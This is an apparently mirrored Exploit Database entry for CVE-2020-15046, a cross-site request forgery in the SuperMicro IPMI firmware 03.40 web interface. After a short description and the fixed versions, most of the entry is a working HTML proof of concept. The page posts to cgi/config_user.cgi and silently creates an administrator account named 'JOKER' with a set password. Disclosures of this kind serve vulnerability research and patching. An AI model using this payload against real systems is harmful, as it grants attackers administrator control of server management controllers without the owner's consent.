SuperMicro IPMI 03.40 – Cross-Site Request Forgery (Add Admin)

• Exploit Database
• 106 阅读

• 作者： Metin Yunus Kandemir
  日期： 2020-07-08
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/48652/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31

  # Exploit Title: SuperMicro IPMI 03.40 - Cross-Site Request Forgery (Add Admin) # Exploit Author: Metin Yunus Kandemir # Vendor Homepage: https://www.supermicro.com/ # Software Link: https://www.supermicro.com/en/solutions/management-software/bmc-resources # Version: X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40 # CVE: CVE-2020-15046 # Source: https://www.totalpentest.com/post/supermicro-ipmi-webgui-cross-site-request-forgery   # Description: # The web interface on Supermicro X10DRH-iT motherboards with BIOS 2.0a and # IPMI firmware 03.40 # allows remote attackers to exploit a cgi/config_user.cgi CSRF issue to add new admin users. # The fixed versions are BIOS 3.2 and firmware 03.88.   # PoC :   <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState(&apos;&apos;, &apos;&apos;, &apos;/&apos;)</script> <form action="https://SuperMicro-IP/cgi/config_user.cgi" method="POST"> <input type="hidden" name="username" value="JOKER" /> <input type="hidden" name="original&#95;username" value="2" /> <input type="hidden" name="password" value="onebadday" /> <input type="hidden" name="new&#95;privilege" value="4" /> <input type="submit" value="submit request" /> </form> </body> </html>